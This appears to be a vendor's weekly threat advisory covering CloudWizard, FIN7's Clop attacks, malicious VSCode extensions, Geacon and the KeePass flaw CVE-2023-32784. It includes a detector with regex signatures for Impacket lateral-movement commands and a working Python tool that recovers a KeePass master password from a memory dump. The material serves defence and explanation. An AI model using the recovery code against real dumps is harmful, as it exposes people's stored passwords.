FIN7 hackers return with Clop ransomware attacks

SISA Weekly Threat Watch - 29 May 2023

The range of infection chains detected last week, along with the highly capable malware tools behind them, leaves no doubt that threat groups are intensifying their operations. Whether it is a newly surfaced APT campaign, malicious extensions stealing sensitive data, or an infamous cybercrime group reappearing with a new wave of attacks, all of them demonstrate the rising sophistication of cyber threats. To maintain a strong defense posture, organizations require stringent access controls, robust endpoint security solutions, and ongoing user training.

SISA Weekly Threat Watch, our weekly feature, brings you a quick snapshot of the major security vulnerabilities and threats that affected organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations that help security teams take appropriate action against the latest critical threats.

1. CommonMagic malware implants linked to new CloudWizard framework

Security researchers have uncovered an APT campaign that uses the PowerMagic and CommonMagic implants together with a modular framework named CloudWizard. The framework can capture screenshots, log keystrokes, and record audio through the device's microphone. The campaign's victims are concentrated in the same geographic region.

One particularly alarming capability of the framework is the extraction of Gmail cookies from browser databases. A stolen session cookie lets the attacker open the victim's Gmail account without re-entering the password or completing an MFA challenge, and then exfiltrate the account's contents. To reduce the attack surface, organizations are advised to enforce strict access controls and policies, and to deploy endpoint security solutions with advanced threat detection, real-time monitoring, and behavior analysis, keeping them updated so that the latest protections are in place. For accounts suspected of exposure, revoking active sessions and resetting credentials invalidates cookies that have already been stolen.

2. Notorious FIN7 returns with Clop ransomware in new wave of attacks

FIN7, a notorious financially motivated cybercrime group known for targeting the U.S. retail, restaurant, and hospitality sectors, emerged from a two-year hiatus to carry out opportunistic ransomware attacks last month. In these attacks, FIN7 used the PowerShell-based POWERTRASH in-memory dropper to deploy the Lizar post-exploitation tool on compromised devices, which gave the threat actors a foothold in the targeted network. They then moved laterally over OpenSSH and with Impacket before deploying Clop ransomware.

The group has also been linked to attacks on PaperCut print servers that ended in Bl00dy, LockBit, and Clop ransomware deployments. Employ Endpoint Detection and Response tools that cover multiple stages of the attack lifecycle so that the malware is stopped before it executes; because POWERTRASH runs as PowerShell entirely in memory, enable PowerShell script block logging and make sure the endpoint tooling consumes AMSI scan results so that the decoded loader is visible to it. Additionally, review domain controllers, servers, workstations, and Active Directory for new or unrecognized accounts, audit accounts with administrative privileges, and configure access controls according to the principle of least privilege.
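The lateral-movement stage above is where Impacket leaves its most recognizable traces on the target host. The following is an added example, not SISA's code and not part of Impacket: it runs two signatures over constructed process-creation events (the shape of Windows Event ID 4688 or Sysmon Event ID 1). The signatures are the default command lines that Impacket's wmiexec.py and smbexec.py cause to execute on the remote machine (output redirected to a "__"-prefixed file on the loopback ADMIN$ or C$ share, and a service binary path that writes %TEMP%\execute.bat); the host names and sample events are made up for the example.

```python
"""Flag Impacket-style lateral movement in process-creation telemetry.

Added example, not SISA's or Impacket's code. The two signatures are the
default command lines that Impacket's wmiexec.py and smbexec.py cause to run
on the target host; the events below are constructed, not real logs.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    """Minimal view of a Windows 4688 / Sysmon Event ID 1 record."""
    host: str
    parent: str    # parent image file name
    command: str   # full command line of the new process


# wmiexec.py runs: cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<unix time> 2>&1
# and the process is spawned by the WMI provider host (WmiPrvSE.exe).
WMIEXEC_RE = re.compile(
    r"cmd(?:\.exe)?\s+/Q\s+/c\s+.+?1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.IGNORECASE
)
# smbexec.py installs a short-lived service (default name BTOBTO) whose binary
# path echoes the command into %TEMP%\execute.bat and redirects its output to
# \\127.0.0.1\C$\__output; the child of services.exe carries that command line.
SMBEXEC_RE = re.compile(
    r"\\\\127\.0\.0\.1\\C\$\\__output|%TEMP%\\execute\.bat", re.IGNORECASE
)
# Fallback: any process writing to a "__"-prefixed file on a loopback admin share.
LOOPBACK_SHARE_RE = re.compile(r"\\\\127\.0\.0\.1\\(?:ADMIN|C)\$\\__", re.IGNORECASE)


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a detection tag for one event, or None if it looks benign."""
    parent = ev.parent.lower()
    if parent == "wmiprvse.exe" and WMIEXEC_RE.search(ev.command):
        return "impacket.wmiexec"
    if parent == "services.exe" and SMBEXEC_RE.search(ev.command):
        return "impacket.smbexec"
    if LOOPBACK_SHARE_RE.search(ev.command):
        return "impacket.loopback-share"
    return None


def detect(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """(host, tag, command) for every event that matches a signature."""
    hits = []
    for ev in events:
        tag = classify(ev)
        if tag:
            hits.append((ev.host, tag, ev.command))
    return hits


# Constructed sample telemetry: two Impacket-shaped events and two benign ones.
SAMPLE_EVENTS = [
    ProcEvent("FS01", "WmiPrvSE.exe",
              r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1685012345.6789 2>&1"),
    ProcEvent("FS01", "explorer.exe", r"cmd.exe /c dir C:\Users"),
    ProcEvent("DC01", "services.exe",
              r"%COMSPEC% /Q /c echo tasklist ^> \\127.0.0.1\C$\__output 2^>^&1 "
              r"> %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"),
    ProcEvent("WS07", "WmiPrvSE.exe", r"C:\Windows\System32\wbem\WMIC.exe os get caption"),
]

if __name__ == "__main__":
    for host, tag, command in detect(SAMPLE_EVENTS):
        print(f"{host}: {tag}: {command}")
```

The parent-process condition matters: legitimate WMI activity also spawns children of WmiPrvSE.exe, so the command-line shape and the parent are checked together. The loopback-share fallback catches operators who change Impacket's defaults but keep the output-file trick; an operator who renames the output file entirely will not match, which is why this belongs beside account auditing rather than in place of it.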

3. Malicious Microsoft VSCode extensions steal passwords, open remote shells

Cybercriminals have started targeting the VSCode Marketplace, the platform where users discover and download extensions to improve their coding experience. Researchers found that malicious extensions on the marketplace had been downloaded by Windows developers a significant number of times. These extensions gave threat actors unauthorized access to victim machines, allowing them to steal credentials, gather system information, and open a remote shell on the compromised host.

Theme Dracula dark: collected basic system information from the developer's machine, including the hostname, operating system, CPU platform, total memory, and CPU details.

python-vscode: code analysis revealed it to be a C# shell injector, able to execute code or commands on the victim's machine.

prettiest java: stole stored credentials and authentication tokens from applications such as Discord, Discord Canary, Google Chrome, Opera, Brave, and Yandex.

Users are advised to remain vigilant when browsing and installing extensions from software repositories and to install extensions only from trusted publishers; a familiar name or theme is not evidence of legitimacy, so check the publisher, the linked source repository, and the extension's ratings before installing. Security tools such as antivirus software that identify and block malicious extensions or their activity (access to browser and Discord credential stores, unexpected outbound connections from the editor) add a further layer of protection.

4. Hackers using Golang variant of Cobalt Strike to target Apple macOS systems

Geacon, an open-source Go implementation of the Cobalt Strike beacon, is gaining popularity among cybercriminals because it brings Cobalt Strike-style tooling to macOS. In October 2022, researchers identified two forks, geacon_plus and geacon_pro, that extend the original project. On April 5, an AppleScript applet named "Xu Yiqing's Resume_20230320.app" was uploaded to VirusTotal; when run, it connects to a remote server and downloads a Geacon payload.

These forks add functionality and underscore the continuous effort to develop evasion techniques in the cybercriminal landscape. The core Geacon payload connects to a command-and-control (C2) server located in Japan to receive further instructions and carry out malicious activity. A multi-layered defense that combines network segmentation, strong access controls, endpoint protection, and network monitoring is recommended; on macOS in particular, treat applets delivered as documents (a "résumé" that is really an .app bundle) and making outbound connections as suspect.

5. KeePass exploit allows attackers to recover master passwords from memory

KeePass is a free, open-source password manager that stores passwords in encrypted form. It encrypts the entire database, i.e., not only the passwords but also usernames, URLs, notes, and so on, and the database can only be opened with the master password. However, a researcher has found a way to recover that master password and has published a proof of concept, KeePass 2.X Master Password Dumper, on GitHub.

According to the post, in KeePass 2.x before 2.54 it is possible to recover the cleartext master password from a memory dump, even when the workspace is locked or KeePass is no longer running; only the first character cannot be recovered. Because a memory dump must first be obtained, exploiting CVE-2023-32784 requires physical access to, or a malware infection on, the target machine. Upgrade to KeePass 2.54, the fixed version, as soon as it is available. Until then, using KeePass with a YubiKey keeps the password out of the text box so that it never enters system memory, and device encryption keeps unauthorized users from reading the disk. Since leftover copies can also reach the pagefile or hibernation file, change the master password after upgrading if the machine may have been exposed.
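To make the "recover from a memory dump" claim concrete, here is an added example that is not the published PoC and not KeePass code. It assumes what the PoC describes for CVE-2023-32784: every keystroke in KeePass's SecureTextBoxEx leaves a managed .NET string (UTF-16) of N mask bullets followed by the character just typed, so typing "Password" leaves "●a", "●●s", "●●●s", "●●●●w" and so on scattered in memory. The "dump" scanned here is constructed by build_fake_dump; against a real dump you would read the file bytes instead.

```python
"""Recover the tail of a KeePass 2.x (< 2.54) master password from a memory dump.

Added example, not the published PoC. It assumes what that PoC describes for
CVE-2023-32784: each keystroke in the SecureTextBoxEx control leaves a managed
string of N mask bullets followed by the typed character, so typing "Password"
leaves "●a", "●●s", "●●●s", ... in memory. The dump used here is constructed.
"""
from typing import List, Set

BULLET = "\u25cf"                        # U+25CF, the mask character KeePass draws
BULLET_LE = BULLET.encode("utf-16-le")   # b"\xcf\x25" inside .NET's UTF-16 strings


def build_fake_dump(*typed: str) -> bytes:
    """Simulate the leftover strings for each value typed into the password box.

    The first character of each value leaves no bullet-prefixed string, which is
    why the real attack cannot recover it either. Constructed data only.
    """
    noise = b"\x00\x00junk\x00\x00"
    chunks = [noise]
    for value in typed:
        for i in range(1, len(value)):
            chunks.append((BULLET * i + value[i]).encode("utf-16-le"))
            chunks.append(noise)
    return b"".join(chunks)


def candidates_by_position(dump: bytes, max_len: int = 64) -> List[Set[str]]:
    """Characters seen after exactly n bullets, for n = 1, 2, ... until none match."""
    result: List[Set[str]] = []
    for n in range(1, max_len):
        prefix = BULLET_LE * n
        found: Set[str] = set()
        pos = 0
        while (i := dump.find(prefix, pos)) != -1:
            pos = i + 1
            # A bullet run preceded by another bullet is the tail of a longer string.
            if i >= 2 and dump[i - 2:i] == BULLET_LE:
                continue
            raw = dump[i + len(prefix):i + len(prefix) + 2]
            try:
                ch = raw.decode("utf-16-le")
            except UnicodeDecodeError:
                continue
            if ch and ch != BULLET and ch.isprintable():
                found.add(ch)
        if not found:
            break
        result.append(found)
    return result


def recover(dump: bytes) -> str:
    """Best-effort reconstruction: '?' marks the unrecoverable first character and
    [..] lists the alternatives where more than one value was typed."""
    parts = ["?"]
    for cands in candidates_by_position(dump):
        parts.append(next(iter(cands)) if len(cands) == 1 else "[" + "".join(sorted(cands)) + "]")
    return "".join(parts)


if __name__ == "__main__":
    print(recover(build_fake_dump("Password")))           # ?assword
    print(recover(build_fake_dump("Pa55", "Password")))   # ?a[5s][5s]word
```

The second run shows the practical limitation of the technique: when several values were typed (a mistyped password followed by the right one), each position can carry more than one candidate and the attacker is left with a short list to try. It also shows why changing the master password after upgrading matters: the leftover strings from the old password survive in any dump, pagefile, or hibernation file taken while the vulnerable version was in use.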

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
